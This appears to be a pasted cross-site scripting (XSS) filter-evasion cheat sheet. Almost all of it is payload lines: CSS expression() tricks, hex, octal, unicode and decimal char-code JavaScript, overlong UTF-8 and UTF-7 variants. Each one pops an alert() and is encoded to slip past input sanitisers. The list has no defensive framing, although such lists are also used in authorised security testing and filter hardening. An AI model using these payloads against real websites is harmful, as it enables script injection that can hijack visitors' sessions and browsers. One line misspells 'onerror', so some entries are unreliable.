- <div style="x:expression(alert(1))">Joker</div>
- <div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
- <div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
- <div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
- JavaScript (hexadecimal, octal, and unicode)
- <script>document.write('<img src=1 onerror=alert(1)>');</script>
- <script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
- <script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
- <script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
- JavaScript (Decimal char codes)
- <script>document.write('<img src=1 onerror=alert(1)>');</script>
- <script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
- JavaScript (Unicode function and variable names)
- <script>alert(123)</script>
- <script>\u0061\u006C\u0065\u0072\u0074(123)</script>
- Overlong UTF-8 (SiteMinder is awesome!)
- < = %C0%BC = %E0%80%BC = %F0%80%80%BC
- > = %C0%BE = %E0%80%BE = %F0%80%80%BE
- ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
- " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
- <img src="1" onnerror="alert(1)">
- %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
- UTF-7 (Missing charset?)
- <img src="1" onerror="alert(1)" />
- +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
- Unicode .NET Ugliness
- <script>alert(1)</script>
- -----------------------------------------------
- Credits ::: Github and other reference !!
- ----------------------------------------------
Add Comment
Please, Sign In to add comment